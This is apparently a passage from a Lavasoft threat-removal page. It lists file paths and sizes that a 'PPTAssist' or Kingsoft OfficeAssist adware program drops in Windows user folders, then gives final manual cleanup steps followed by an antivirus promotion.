    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
    %Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
    %Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now